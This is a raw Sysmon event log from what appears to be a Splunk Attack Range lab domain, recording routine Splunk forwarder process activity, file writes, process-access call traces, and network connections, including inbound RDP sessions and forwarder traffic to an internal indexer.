09:06:45.820{5EBD8912-89A5-6151-117A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.803{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D283B1600D472BF386E37A20748CA15,SHA256=4BBE04B42C7BB346E7ACBE38D17728714E99A40792A74E8E7C34F5ABEDF1516A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:45.333{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D11C5F04372AC0CE880A0E802BB3F56,SHA256=D2D5D5A315690DC2EBCB5AA731A6239709D6C1DDAA741C58906F177B38DFABF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19EED3EB570FDF81E3BC15E902D615C9,SHA256=DD134263D375EE9E09AD7AA1C6221828F4A099A96AD3707EF744E169EFB5000C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89A5-6151-107A-00000000FC01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89A5-6151-107A-00000000FC01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.287{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89A5-6151-107A-00000000FC01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.273{5EBD8912-89A5-6151-107A-00000000FC01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:46.834{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D73042DA0E87975443437C2B0C7F89F9,SHA256=C794B82F8B9860E9FB3F5FA8D0AB526487D9EBAB5BA26E939A139EA45665C86C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:46.818{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A228345688AE58E3379E65A48A3F23B,SHA256=D0A175E408C7956945D4EC84D7B4462C114E86874D36DFB9130DE67AC1FE2AE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:43.650{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59321-false10.0.1.12-8000- 23542300x8000000000000000977801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:46.349{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88AAEE3CBF560AF2D2EFDE3002EBC45F,SHA256=4C603C28583A33AC754A0F9CA891B92772AF82E3BC6BDA7FE2E5954E03B9E315,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:46.003{5EBD8912-89A5-6151-117A-00000000FC01}41124248C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:47.849{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A41EF035C1B909F25E71B569A09CB13F,SHA256=355EAAD9A379473A95F5488F64866C4FAE1125D60AF80003B11B47DD244DB85F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:47.833{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC21B72A4FD1F33AD730CA0C33FAEEA2,SHA256=C66419A84C9E94683839251F77DED8776B23E42C111604091E8B965593406B84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:47.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAF2BC73821A7EE058FFD218D2297634,SHA256=64593EDB4C36BEB9CAC877D4AA804F83B4115DBAF7C4B3C4DC71C7F66906C34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:48.886{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0203BB1260FEB68756AAA7876E5C463C,SHA256=C9E68679272348C0BD0B10A79632E96447D497CF4877D913D73A9CD584E7882D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:48.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607BB67A3DD36E29F72BC30ECFDC2AAF,SHA256=525714E603EC5558B0C4957EBFBCC53ECD6AD12ECB97ED949D8AB6D7E4972BBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:46.203{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60780-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000977805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:48.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F659E372F09248E3ABAB68D2B4F2CF8,SHA256=BC5E0C4723FA9F1075531E67D585237E653C1E3657540EA23FB074B5B85476A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:48.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A792BE9BE0C7CDBEA8A0F44FF624B1DE,SHA256=DB7434C771B537341630348CB46780F0672C0EA6E02ABCEB545A7772B3D21AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:49.901{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2E2D2F5A05FF28A2954000C4D8DD74,SHA256=2AE75883CC2C6CAD82879E9F76061A5349AEE9BBEE2545A8B0DBD7033DA18920,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:45.561{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58177-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:49.381{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9A0890DEEBA423B2C76F2B363145296,SHA256=42EC5EC694AC0FB5089F76BECF690DC3FB72388497BDE35369DEC6407C6BA415,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:47.825{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53288-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:50.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2E14C02483F71B77526E0E915FB9EDA,SHA256=BB0BB77F760E03AED863A33EFDF7357D80D3953B2A2BBAA4534984BB5F0FB631,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:46.508{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58852-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:50.396{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B856933B359A8ED54361492126D08CBF,SHA256=FD69045B709D354662E31DE46415D9058EA89BBC868B8A4158F7B9AC3E3E1146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:50.349{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F659E372F09248E3ABAB68D2B4F2CF8,SHA256=BC5E0C4723FA9F1075531E67D585237E653C1E3657540EA23FB074B5B85476A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:48.821{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59322-false10.0.1.12-8000- 23542300x8000000000000000977812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:51.396{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15C252BF88B1131089404260F19CE926,SHA256=842E9804732585F69A1CE7857428CBBF7A820F305C8E860FF624581A7ED67F80,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:49.903{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60974-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:52.661{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5EDFEBE5D0BB2CEFC08F87B7BD4224C,SHA256=9CB87B6B63E4E3282B94FD8E794D6E13DC15D7B886A4536B890D3B67BDD4C128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:52.411{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBFE3A569324718E1515C2CD665ACBD9,SHA256=F71AFCC2AA0DE72FA43D8FABF5E08FCC988A9EF0396682E666A25E8501651262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:52.164{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130AC58890D1A38C099F1A46C98D9D1C,SHA256=C3C869EE7653EF50FD022C7B4267ADD6D6BD607FF6A74FE718EE830F26F2AC6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:53.427{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D1970EAEF2E23F98407A9329229FEC,SHA256=31C3A0CCE1DCBD74BBA6DF3F032C46EEB816885019D51C1FDB2F39F444C33036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:53.187{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD750BBF281C2C0AF6B825FD753A0564,SHA256=0A6A728DF1A40C88BF68CA93C3A19C13FB4D10994641A58F8AB89C6C3153333B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:54.443{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9522E14691BC15430723D5856960FFCB,SHA256=B261D50AB89BC1A4D7CA5A2AE2A28E7616EE72048E089CBE7F8E939DAAC5EA6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.901{5EBD8912-89AE-6151-137A-00000000FC01}69606824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:54.733{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89AE-6151-137A-00000000FC01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 